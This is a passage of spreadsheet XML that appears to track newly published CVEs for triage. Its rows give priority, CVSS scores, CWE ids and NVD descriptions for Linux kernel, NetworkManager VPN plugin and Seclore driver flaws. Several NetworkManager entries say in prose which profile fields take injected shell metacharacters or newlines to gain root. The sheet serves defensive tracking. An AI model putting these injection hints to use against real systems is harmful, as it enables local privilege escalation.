        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100597</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79153</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>Seclore FileSecure Desktop Client before 3.25.1.0 contains improper access control vulnerability in the kernel-mode driver component that allows an authenticated local user to gain elevated privileges to NT AUTHORITY\SYSTEM on affected systems.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79153</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91837</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-iodine, the iodine VPN plugin for NetworkManager. A local unprivileged user can exploit a vulnerability in how the 'nameserver' setting is processed when establishing an iodine VPN connection. By embedding shell metacharacters (special characters that can execute commands) in the 'nameserver' value, an attacker can inject and execute arbitrary commands. These commands run with root privileges before the application drops its elevated permissions, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91837</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91838</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-sstp, the SSTP VPN plugin for NetworkManager. A local unprivileged user can exploit this vulnerability by embedding special characters, known as shell metacharacters, into VPN connection profile fields such as CA certificate or proxy settings. These unescaped characters are then processed by the `pppd` daemon, which runs with root privileges, allowing the attacker to execute arbitrary commands with elevated permissions when a malicious VPN connection is activated.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91838</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91839</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-fortisslvpn, the FortiSSLVPN plugin for NetworkManager. The nm-fortisslvpn-service improperly handles carriage-return/line-feed (CR/LF) characters in VPN connection profile credentials. A local unprivileged user can exploit this by crafting a malicious VPN profile to inject additional configuration directives. This can lead to arbitrary code execution with root privileges when the crafted VPN connection is activated.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91839</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91840</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-vpnc. This vulnerability allows a local unprivileged user to escalate privileges to root. By injecting a newline character into the VPN username field, an attacker can manipulate the vpnc configuration to execute an arbitrary program with root privileges when the malicious VPN connection is activated.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91840</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91841</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-vpnc, a VPN plugin for NetworkManager. A local unprivileged user can exploit this vulnerability by injecting a newline character into the CA-File path. This manipulation allows the user to execute arbitrary commands as the root user, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91841</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97548</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr"/>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix the rtrmap and rtrefcount _maxlevels_ondisk functions
The _maxlevels_ondisk functions are used to compute the size of
in-memory btree cursors for each btree type.  Unfortunately, LOLLM
noticed that the rtrmap and rtrefcount versions of these functions
forget to account for the inode root, which means that we could access
beyond the end of the cursor given a sufficiently large btree.  Fix
this.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97548</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97575</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr"/>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-ctrls: validate AV1 tile counts
The stateless AV1 decoders use tile_info.tile_cols and tile_rows as loop
bounds and as indices into the mi_*_starts[] and *_in_sbs_minus_1[]
arrays, as the divisor for context_update_tile_id, and their product
bounds the per-tile descriptor buffers, but std_validate_compound() does
not bound these u8 fields. Reject a V4L2_CTRL_TYPE_AV1_FRAME whose
tile_cols or tile_rows exceeds V4L2_AV1_MAX_TILE_COLS / _ROWS, or whose
product exceeds V4L2_AV1_MAX_TILE_COUNT. A zero tile count is left to the
consuming driver so the zero-initialised control that existing userspace
submits is still accepted.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97575</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97576</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr"/>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-ctrls: validate HEVC tile counts
The stateless HEVC decoders read num_tile_columns_minus1 + 1 entries from
column_width_minus1[] and num_tile_rows_minus1 + 1 from row_height_minus1[]
and use them as tile-loop bounds, but std_validate_compound() does not
bound these u8 counts. Reject a V4L2_CTRL_TYPE_HEVC_PPS with tiling
enabled whose tile counts exceed the uAPI array capacity, mirroring the
existing compound-control range checks.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97576</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97577</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr"/>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: verisilicon: rockchip: reject AV1 frames exceeding the tile capacity
rockchip_vpu981_av1_dec_set_tile_info() indexes the tile group entry
array by tile1 * tile_cols + tile0, reading up to tile_cols * tile_rows
entries, lays out one descriptor per tile in the AV1_MAX_TILES tile_info
buffer, and programs the real tile_cols / tile_rows into the hardware.
The tile group entry control is a dynamic array sized to the number of
entries userspace submitted, independent of tile_cols / tile_rows, so a
frame that claims more tiles than entries reads past the array. A frame
that claims more than AV1_MAX_TILES tiles also leaves the hardware
programmed for more tiles than the descriptor buffer holds.
Reject both in prepare_run(): tile_cols * tile_rows must not exceed the
submitted entry count or AV1_MAX_TILES. The entry count is read via
v4l2_ctrl_find() (ctrl-&gt;elems). This mirrors the bound the mediatek AV1
decoder already enforces.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97577</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97578</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr"/>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: verisilicon: rockchip: guard VPU981 AV1 divisor and tile buffer
rockchip_vpu981_av1_dec_set_tile_info() divides context_update_tile_id by
tile_info-&gt;tile_cols and writes one descriptor per tile into the tile_info
DMA buffer, which holds AV1_MAX_TILES entries; tile_cols and tile_rows
come from the bitstream. Guard the division against a zero tile_cols by
initialising the context-update values to zero and computing them only
when tile_cols is non-zero, and stop the descriptor writes once the
tile_info buffer is full. The tile geometry written to the hardware
registers is left unmodified; the per-dimension and total tile bounds are
enforced by the control validation.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97578</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97579</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr"/>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: mediatek: vcodec: bound AV1 tile-start copy to the array capacity
vdec_av1_slice_setup_tile() copies tile_cols + 1 / tile_rows + 1 entries
into mi_col_starts[] / mi_row_starts[] from the bitstream tile_info. Bound
the copy to the array capacity.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97579</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97580</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr"/>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rkvdec: bound HEVC tile loops and PPS id to the array capacity
compute_tiles_uniform() and compute_tiles_non_uniform() loop over
num_tile_columns_minus1 + 1 / num_tile_rows_minus1 + 1 entries, and
assemble_hw_pps() writes one COLUMN_WIDTH / ROW_HEIGHT register per tile
and indexes priv_tbl-&gt;param_set[] by pic_parameter_set_id, all taken from
the untrusted PPS. Use the bounded v4l2_hevc_pps_num_tile_columns() /
v4l2_hevc_pps_num_tile_rows() helpers for the tile loops, and bail out of
assemble_hw_pps() before indexing priv_tbl-&gt;param_set[] with an
out-of-range pic_parameter_set_id, so the writes stay within the hardware
tables.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97580</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97584</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr"/>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix incorrect free in candidate cleanup in afs_lookup_server()
Fix afs_lookup_server() to not free an existing server's endpoint state
when cleaning up a candidate server.  The candidate record doesn't have an
endpoint state yet at this point, so the free for that can just be removed.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97584</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97594</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr"/>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
landlock: Fix use-after-free of the source's parent directory
current_check_refer_path() reads old_dentry-&gt;d_parent without holding a
reference nor a lock on it, and then dereferences it in
collect_domain_accesses() and in the audit record.
A reference on a child does not pin its parent: __d_move() reassigns
dentry-&gt;d_parent and drops the reference the child held on its former
parent.  hook_path_rename() is not affected because the rename path
calls lock_rename() before the hook, so the source cannot be reparented
under it.  hook_path_link() has no such protection: filename_linkat()
